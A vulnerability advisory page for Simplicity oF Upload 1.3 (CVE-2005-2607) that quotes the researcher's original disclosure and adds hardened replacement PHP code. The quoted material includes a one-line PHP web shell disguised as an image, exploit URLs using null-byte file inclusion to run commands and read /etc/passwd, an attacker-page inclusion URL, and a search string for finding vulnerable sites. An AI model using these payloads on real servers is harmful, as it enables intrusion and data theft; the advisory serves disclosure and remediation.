SecurityTracker.com

SecurityTracker Archives

Category:   Application (File Transfer/Sharing)  >   Simplicity oF Upload
Vendors:   PHPSimplicity.com
Simplicity oF Upload Lets Remote Users Upload and Execute Arbitrary Code
SecurityTracker Alert ID:  1014591
SecurityTracker URL:  http://securitytracker.com/id/1014591
CVE Reference:   CVE-2005-2607
Updated:  Jul 6 2008
Original Entry Date:  Jul 28 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.3
Description:   rgod reported a vulnerability in Simplicity oF Upload. A remote user can upload and then execute arbitrary code on the target system.

The script does not properly validate user-supplied input in the 'language' parameter. A remote user can supply a specially crafted parameter value ending in a null byte (%00) to include arbitrary local files.

A remote user can submit the following URL to cause both the download and upload pages to load at the same time:

http://[target]/simply/download.php?language=upload.php%00

This allows the remote user to upload a file that contains arbitrary PHP code but has a filename that appears to be an image file (e.g., 'cmd.gif'). A demonstration exploit file is provided:

<?php

system($HTTP_GET_VARS[command]);

?>

Then, the remote user can invoke the uploaded file to execute arbitrary commands on the target system with the privileges of the target web service. A demonstration exploit URL is provided:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

A remote user can also supply a specially crafted URL that, when loaded by the target user, will redirect the target user to another web page:

http://[target]/[path]/download.php?language=http://[attacker]/[evil_page]%00
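Added here as an editorial example, not the vendor's code or a vendor patch: a hardened replacement for the language-override block quoted in the source message below (`require_once("$language.lng")`). It assumes the language files live in a lang/ subdirectory next to the script and are named like en.lng; that directory layout and the 2-8 letter code format are assumptions, not something the advisory states.

```php
<?php
// Added example (not the project's own code). Hardened language selection:
// the request can only pick a name that passes a strict pattern AND matches a
// .lng file that actually exists in the assumed ./lang/ directory.
declare(strict_types=1);

const LANG_DIR = __DIR__ . '/lang';   // assumed location of the .lng files
const DEFAULT_LANG = 'en';            // assumed fallback language

// Allowlist built from disk, so the client can never name a file the
// administrator did not install (no traversal, no null bytes, no URLs).
function allowedLanguages(): array
{
    $langs = [];
    foreach (glob(LANG_DIR . '/*.lng') ?: [] as $path) {
        $langs[] = basename($path, '.lng');
    }
    return $langs;
}

// Map the raw ?language= value to a safe language code.
function selectLanguage(?string $requested): string
{
    if ($requested === null) {
        return DEFAULT_LANG;
    }
    // Only short, purely alphabetic codes are considered. \z (not $) is used
    // so a trailing newline cannot slip past the pattern. Anything with a
    // null byte, a dot, a slash or a scheme like "http://" is rejected here,
    // before any path is ever built from it.
    if (!preg_match('/^[a-z]{2,8}\z/', $requested)) {
        return DEFAULT_LANG;
    }
    return in_array($requested, allowedLanguages(), true) ? $requested : DEFAULT_LANG;
}

$language = selectLanguage(isset($_GET['language']) ? strtolower($_GET['language']) : null);

// The included path is now assembled only from a constant and an allowlisted
// code, never from the request string itself.
require_once LANG_DIR . '/' . $language . '.lng';
```

PHP 5.3.4 and later already refuse a null byte inside a filesystem path (PHP 8 raises a ValueError), so the %00 truncation itself no longer works on current interpreters. The allowlist still matters because the same parameter also permitted ../ traversal and remote URLs, which the null byte was only used to terminate.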

Impact:   A remote user can upload arbitrary code to the target system and then have the web server execute the code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpsimplicity.com/scripts.php?id=3
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  Simplicity OF Upload 1.3 (possibly prior versions) remote code execution & cross site scripting


Simplicity OF Upload 1.3 (possibly prior versions) remote code execution
& cross site scripting
 
software:
author site: http://www.phpsimplicity.com/scripts.php?id=3
 

remote command execution:
 
problem at lines 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
   $language = strtolower($_GET['language']);
 
//now we include the language file
require_once("$language.lng");
...
 
you can include whatever you want by adding a null byte to the "language" parameter value:
 
example:
http://localhost:30/simply/download.php?language=upload.php%00
 
you will see upload & download page together :)
 
so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...)  file with this php code inside to execute
commands:
 
<?php
 
system($HTTP_GET_VARS[command]);
 
?>
 
then try this url:
 
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
 
to list directories
 
http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd
 
to show the /etc/passwd file
 
cross site scripting:
 
also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:
 
http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
 
 
 
googledork:
 
"Powered By: Simplicity oF Upload"
 

rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html
		
Copyright 2021, SecurityGlobal.net LLC